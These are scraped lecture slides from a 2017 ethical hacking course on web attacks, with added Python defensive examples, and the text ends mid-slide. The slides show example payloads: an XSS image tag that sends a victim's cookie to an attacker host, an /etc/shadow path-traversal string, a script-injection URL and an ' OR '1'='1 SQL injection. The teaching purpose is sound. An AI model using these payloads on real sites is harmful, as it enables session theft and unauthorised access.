Introduction to Ethical Hacking Summer University 2017 Seoul, Republic of Korea Alexandre Karlov

Introduction to Ethical Hacking - csap Web and... · Introduction to Ethical Hacking Summer University 2017 ... • Nginx • Etc… SU17 ... 3xx Redirection 301 Moved Permanently

Embed Size (px)

Citation preview

Page 1

Introduction to Ethical Hacking

Summer University 2017 Seoul, Republic of Korea

Alexandre Karlov

Page 2

Today

• Some tools for web attacks

• Wireshark

• What a writeup looks like

Page 3

0x04 Tools for Web attacks

Page 4

SU17, Ethical Hacking class, Seoul, 2017

Overview

• Reminders
  • HTTP, requests / responses, GET / POST
  • SQL
  • OWASP

• A few useful tools

• Attacks
  • URL manipulation
  • Client-side protections
  • «Session Hijacking»
  • «Cross-site scripting» (XSS)
  • «Cross-site request forgeries» (CSRF)
  • SQL injections

Page 5


HTTP: a few reminders

• HTTP: HyperText Transfer Protocol

• Designed to exchange resources

• Communication protocol

• Client-Server architecture (requests - responses)

• Application layer, on top of a reliable stack (TCP/IP)

• It is stateless

Diagram: a client (identified by its IP address) speaks HTTP (TCP port 80) to the server software, which serves files and resources.

Page 6


Client-server architecture

Diagram: the HTTP listener (TCP port 80) waits for a connection. The Web browser (client, identified by its IP address) opens a connection and asks "I want […]" (GET); the server returns [content] and the connection is closed. The user clicks… and the cycle repeats.

Clients:
• Browsers
• Applications (mobile / desktop)
• Robots, spiders
• Scanners, fuzzers

Servers:
• Apache
• Microsoft Internet Information Services (IIS)
• Tomcat
• Nginx
• Etc…

Page 7


HTTP request

Client → Server

Request:
<METHOD> <RESOURCE> <PROT_VERSION>
<HEADERS>
<empty line>
<CONTENT (optional)>

Most of the time the method is GET or POST.

Page 8


HTTP header fields

– General:
  Cache-Control: no-cache
  Date: Tue, 15 Nov 2005 08:12:31 GMT

– Request:
  Accept: text/plain;q=0.5, text/html
  Accept-Charset: iso-8859-5, unicode-1-1;q=0.8
  From: [email protected]
  Referer: http://www.iict.ch/index.html
  User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)

– Response:
  Location: http://www.heig-vd.ch
  Server: Microsoft-IIS/6.0

– Entity:
  Content-Encoding: gzip
  Content-Length: 3495 (in bytes)
  Content-Type: text/html; charset=ISO-8859-4
  Last-Modified: Tue, 15 Nov 2005 12:45:26 GMT

Page 9


HTTP response

Client → Server: Request
Server → Client: Response

Response:
<PROT_VERSION> <STATUS-CODE> <STATUS-PHRASE>
<HEADERS>
<DATA>

Code | Class         | Examples
1xx  | Informational | 100 Continue
2xx  | Success       | 200 OK
3xx  | Redirection   | 301 Moved Permanently; 302 Found (temporarily at another URI); 304 Not Modified
4xx  | Client error  | 400 Bad Request; 401 Unauthorized; 403 Forbidden; 404 Not Found
5xx  | Server error  | 500 Internal Server Error; 503 Service Unavailable

<HEADERS> carry the meta-data; <DATA> is the content: a file (HTML, JPG, CSS, …) or a dynamic page (PHP, JSP, …).

Page 10


HTTP with many resources

Client Server

Request image 1

Transfer image 1

Request image 2

Transfer image 2

Request main HTML

Transfer HTML

Finish and display page

Page 11


HTTP stateless?

• HTTP is stateless
• A response depends only on the request (independent from other requests/responses)

• Personalized URLs
  • www.isi.com/member.php?id=22393269459487635

• Cookie usage
  • Uses special header fields
  • Set-Cookie header (in a response): sets a cookie value.
  • Cookie header (in a request): sends the cookie back to the server.
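The request template from the "HTTP request" slide (method, resource, version, headers, empty line, optional content) and the Cookie header described above, handled by a small added Python parser. This is not code from the slides; the sample request, host and cookie values are constructed.

```python
from dataclasses import dataclass


@dataclass
class HttpRequest:
    method: str
    resource: str
    version: str
    headers: dict
    body: bytes

    def cookies(self) -> dict:
        """Split the Cookie header ("name=value; other=x") into a dict,
        which is what the server reads back after it sent a Set-Cookie."""
        out = {}
        for part in self.headers.get("cookie", "").split(";"):
            if "=" in part:
                name, value = part.strip().split("=", 1)
                out[name] = value
        return out


def parse_request(raw: bytes) -> HttpRequest:
    """Parse <METHOD> <RESOURCE> <PROT_VERSION>, the header lines, the empty
    line, and the optional content whose size Content-Length announces.

    Header names are lower-cased (HTTP treats them case-insensitively).
    Bytes beyond the declared Content-Length are ignored, not parsed as body.
    """
    head, sep, rest = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no empty line terminating the headers")
    lines = head.decode("iso-8859-1").split("\r\n")
    method, resource, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    length = int(headers.get("content-length", "0"))
    if length > len(rest):
        raise ValueError("content shorter than Content-Length")
    return HttpRequest(method, resource, version, headers, rest[:length])


# Constructed sample request (host and cookie values are made up for the example).
SAMPLE = (b"POST /member.php HTTP/1.1\r\n"
          b"Host: www.isi.com\r\n"
          b"Cookie: PHPSESSID=abc123; lang=fr\r\n"
          b"Content-Type: application/x-www-form-urlencoded\r\n"
          b"Content-Length: 8\r\n"
          b"\r\n"
          b"id=22393")
```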

Page 12


Databases / SQL

• Most of the time, the Web application uses a database to store data

Diagram: the client (IP address) speaks HTTP (TCP port 80) to the Web server, which serves files and resources (dynamic pages); the Web server in turn speaks SQL (TCP port 3306) to the database server.

Page 13


Simple Query Language (SQL)

• Example of the table « users »:

id | name    | password
1  | Artur   | Art_pwd
2  | Charlie | kjasd7812
3  | Bob     | 912kkas9
4  | Elvis   | 1234

• Simple commands allow the Web application to interact with the database:
  • INSERT INTO users (id, username, password) VALUES ('4', 'Elvis', '1234');
  • UPDATE users SET password = '4567' WHERE username = 'Elvis';
  • DELETE FROM users WHERE username = 'Elvis';
  • SELECT id, username FROM users WHERE username = 'Elvis' AND password = '1234';

Page 14


OWASP overview

• The Open Web Application Security Project (OWASP)
• International organization, Open Source
• Free participation, open to anyone
• Mission: promote application security
  • Web, software, mobile, …
• Resources:
  • Documentation (wiki, books, ...), guides, mailing lists, code, tools, local chapters & conferences, …
• ~30,000 people, 190 chapters, 140 projects, supporters
• www.owasp.org

Page 15


OWASP: Projects / knowledge

Projects:
• Top 10
• WebGoat
• WebScarab
• Zed Attack Proxy (ZAP)
• ESAPI
• ASVS
• Development guide
• Code review guide
• Testing guide
• and many, many others.

Knowledge base:
• 9,421 articles
• 427 presentations
• 200 updates per day
• +300 mailing lists
• 180 blogs
• 19 hacking attempts
• 2,962 files uploaded

Source: https://www.owasp.org/images/f/f9/OWASP_Overview_Winter_2009v1.pptx

Page 16


OWASP: Top Ten (2013)

[source] http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx

Page 17


Useful tools

• Web browsers
  • Some attacks require just a browser.
  • Some attacks require additional tools
    • Browser plugins (Tamper Data, Firebug, etc.)
    • External tools for analysis/interception of communications

• Example: advanced interception proxies
  • The «simple» proxies became powerful suites with many functionalities
  • Example: Burp Suite

• Automated tools
  • Web scanners/fuzzers/spiders

Page 18


Interception Proxy

Diagram: the client's requests... go to the proxy, which relays or alters the messages, and the server's responses... come back the same way. The tools (browser, etc.) should be configured to connect to the local proxy.

• Other functionalities:
  • Interception proxy
  • Spider
  • Fuzzer
  • Vuln scanner
  • Manual requests
  • Cookies/session/tokens analyzer

Examples: Burp, ZAP Proxy, Nikto, TamperData, …

Page 19


Burp Suite

• The most well-known toolbox for web hacking
• Comprises:
  • Proxy - intercept and modify requests
  • Spider - discover content
  • Scanner - vulnerability scanner
  • Intruder/Repeater - attack tools
  • …
• Free version available in Kali

Page 20


Web attacks

• URL manipulation

• Client-side protections

• «Session Hijacking»

• «Cross-site scripting» (XSS)

• «Cross-site request forgeries» (CSRF)

• SQL injections

• (and many others)

Page 21


URL manipulation / forgery

• Resource discovery
  • In a URL:
    • "../.."
    • "../../../../../etc/shadow" (password file)
  • In a general way:
    • URL forgery for directories
    • URL forgery to access special files (e.g.: *.php~)
    • Parameter tampering in the URL or in the cookie: identifier, role, resource, etc.
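The server-side check that defeats the "../.." and *.php~ cases above, as an added Python example (not code from the slides): the requested path is decoded, normalised and then tested for containment in the web root. The web root and the blocked-suffix list are constructed for the example.

```python
from pathlib import Path
from typing import Optional
from urllib.parse import unquote, urlsplit

# Constructed web root for the example; it does not need to exist on disk.
WEB_ROOT = Path("/srv/www")

# Editor/backup leftovers that must never be served (the slide names *.php~).
BLOCKED_SUFFIXES = ("~", ".bak")


def resolve_under_root(request_target: str, web_root: Path = WEB_ROOT) -> Optional[Path]:
    """Map a request target such as "/img/../../../etc/shadow" to a file path.

    Returns the resolved path when it stays inside web_root, otherwise None.
    The query string is dropped (it never names a file), the path is
    percent-decoded before normalisation so "%2e%2e/" cannot slip through,
    and resolve() collapses every ".." before the containment check.
    """
    path_part = unquote(urlsplit(request_target).path)
    root = web_root.resolve()
    candidate = (root / path_part.lstrip("/")).resolve()
    if not candidate.is_relative_to(root):
        return None  # escaped the web root: the "../.." case
    if candidate.name.endswith(BLOCKED_SUFFIXES):
        return None  # special file such as index.php~
    return candidate


def check_targets(targets) -> dict:
    """Convenience: map each request target to True (servable) or False (refused)."""
    return {t: resolve_under_root(t) is not None for t in targets}
```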

Page 22


Client side protections

• Client side protections can be bypassed!
  • Cookie values
  • «Referer»
  • Javascript or any result of a script which gets executed client-side
  • Fields (even if choice selection, hidden, or protected by Javascript)
  • and many others

• The Web application should do (or re-do) the controls server-side.

Page 23


Session hijacking

• A session can be stolen: log into a system without authenticating
• HTTP: cookie stolen, URL stolen, URL forgery, etc.

Diagram 1 (get the session by stealing the id parameter):
  Client → Server: GET pub.php&id=2093847029
  Server → Client: pub.php&id=2093847029

Diagram 2 (get the session by stealing the cookie):
  Client → Server: GET index.html
  Server → Client: index.html, Set-Cookie
  Client → Server: GET pub.html, Cookie
  Server → Client: pub.html
  Stealing the cookie is enough to access the session!

Page 24


XSS - Cross site scripting

• Reflected XSS (non-persistent)
  • The attacker injects data, and it is used as-is in the response or in a script.
  • Example: search engine on websites.

• Stored XSS
  • The data injected by an attacker is stored on the server.
  • At each new access, the client will receive the stored script (XSS).
  • Examples: forums, guest books, ....

• DOM-based XSS
  • « Document Object Model » (DOM) modification
  • Injection generally happens in the URL.

• BeEF tool - Browser Exploitation Framework
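The reflected case above (a search term echoed into the page), as an added Python example that is not from the slides: the vulnerable rendering beside the hardened one that escapes on output. The page template and the probe input are constructed; DOM-based XSS is not covered here, since there the fix belongs in the page's own client-side script.

```python
from html import escape

# Constructed page template: the query is reflected both in text and in an attribute.
TEMPLATE = ('<html><body><p>Results for: {q}</p>'
            '<input name="q" value="{q}"></body></html>')

# Probe taken from the DOM-based XSS slide, reused here as constructed test input.
PROBE = '<script>alert(document.cookie)</script>'


def render_unsafe(query: str) -> str:
    """Vulnerable rendering: the value is inserted as-is (the slide's reflected case)."""
    return TEMPLATE.format(q=query)


def render_safe(query: str) -> str:
    """Hardened rendering: escape on output. quote=True also converts the quote
    characters, so a value cannot close the value="..." attribute early."""
    return TEMPLATE.format(q=escape(query, quote=True))


def reflects_script(page: str) -> bool:
    """Check used to compare the two renderings: is a literal <script tag present?"""
    return "<script" in page.lower()
```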

Page 25


XSS - Example: stealing a webmail cookie

Actors: www.pirate.com (attacker) and www.coldmail.com (webmail).

1. Send an email. The email contains:
   <img src="http://www.urlinexsitante.com/im.jpg" onerror="window.location='http://www.pirate.com/cookie.php?a='+document.cookie;">
2. Alice connects to the webmail
3. Alice accesses the URL: http://www.pirate.com/cookie.php?a=[cookie] (the cookie used is the one from coldmail.com)
4. Collect the cookie
5. Session hijacking

Page 26


DOM-based XSS: example

• Source: https://www.owasp.org/index.php/DOM_Based_XSS
• Expected: http://www.some.site/page.html?default=French
• Attack: http://www.some.site/page.html?default=<script>alert(document.cookie)</script>
• The browser creates a DOM object for the page.

Page 27


CSRF - «Cross-Site Request Forgeries»

• CSRF is an attack that forces a user to execute unwanted action(s) on the Web application.
• To force the user, the attacker must get them to send a specially crafted request (delete something, change profile, change email address, etc.)
• The attacker crafts the « right » request.
• Note that the user must already be authenticated (and have interesting privileges) within the application targeted by the attacker.
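Server-side defences for the session hijacking, cookie-theft XSS and CSRF slides, as an added Python example (not code from the slides): an unguessable session id sent with protective cookie attributes, and a per-session token checked on every state-changing request. The cookie name, the in-memory session store and the function names are constructed.

```python
import hmac
import secrets
from typing import Tuple

SESSIONS = {}  # session id -> server-side state (constructed in-memory store)


def start_session(user: str) -> Tuple[str, str]:
    """Create a session and return (session id, Set-Cookie header value).

    The id is random (unlike the guessable member.php?id=... URL), so it cannot be
    forged. HttpOnly keeps document.cookie from reading it, which blunts the webmail
    cookie-theft XSS; Secure keeps it off plaintext HTTP; SameSite=Strict stops the
    browser from attaching it to cross-site requests, the vector CSRF relies on.
    """
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    header = f"session={sid}; Path=/; HttpOnly; Secure; SameSite=Strict"
    return sid, header


def csrf_token(sid: str) -> str:
    """Token to embed as a hidden form field in pages served to this session."""
    return SESSIONS[sid]["csrf"]


def accept_state_change(sid: str, submitted_token: str) -> bool:
    """Authorise a state-changing request (delete, change e-mail, ...) only if the
    session exists and the submitted token matches the one issued to that session.
    compare_digest avoids leaking the token through timing differences."""
    state = SESSIONS.get(sid)
    if state is None:
        return False
    return hmac.compare_digest(state["csrf"], submitted_token)
```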

Page 28


Injections

• SQL injections
  • A Web application contains a form whose fields are used to build a SQL query. Without protection, it is possible to « play » with the SQL command.
  • Example of an HTML authentication form with login and password:
      SELECT nom, pwd FROM user_db WHERE nom ='$login' AND pwd ='$password'
    If the SQL query returns something, we continue... else authentication failed.
  • If we try to log in with toto and ' OR '1'='1 :
      SELECT nom, pwd FROM user_db WHERE nom='toto' AND pwd='' OR '1'='1'
    We get an SQL query that always returns something (if toto exists). The user will be accepted even if the password is wrong!

• System command injection
  • Same idea, but in a command that is executed by the system.
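The authentication query above run two ways against an in-memory SQLite table, as an added Python example (not code from the slides): built by string concatenation as on the slide, and with a parameterised query. The user_db rows are constructed.

```python
import sqlite3

# Constructed test data using the slide's column names (nom, pwd). Passwords are
# stored in clear only to mirror the slide; a real application stores a salted hash.
ROWS = [("toto", "secret"), ("Elvis", "1234")]


def make_db() -> sqlite3.Connection:
    """Create the user_db table in memory and load the constructed rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE user_db (nom TEXT, pwd TEXT)")
    con.executemany("INSERT INTO user_db VALUES (?, ?)", ROWS)
    return con


def login_vulnerable(con: sqlite3.Connection, login: str, password: str) -> bool:
    """Vulnerable: the values are spliced into the SQL text, so a quote in the
    password rewrites the WHERE clause (pwd='' OR '1'='1' matches every row)."""
    sql = f"SELECT nom, pwd FROM user_db WHERE nom ='{login}' AND pwd ='{password}'"
    return con.execute(sql).fetchone() is not None


def login_parameterised(con: sqlite3.Connection, login: str, password: str) -> bool:
    """Hardened: placeholders keep the values out of the SQL grammar; the driver
    hands them to the engine as data, so ' OR '1'='1 is just a wrong password."""
    sql = "SELECT nom, pwd FROM user_db WHERE nom = ? AND pwd = ?"
    return con.execute(sql, (login, password)).fetchone() is not None
```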

Page 29

0x05 Wireshark

Page 30

Wireshark

• The ultimate packet sniffer

• Understanding/reverse engineering of protocols

• Network debugging

• Traffic analysis

Page 31

Wireshark

• Capture filters

• Display filters

Page 32

Wireshark

• Reconstructing streams

Page 33

Last but not least

• Netcat

• Hacker’s Swiss Army Knife

• Read and write TCP ports

• Transferring files, remote administration, reverse shells,…

• Tcpdump

• Command-line packet capture and analyser

• When GUI is not available

• Fast

• To capture for further analysis with Wireshark: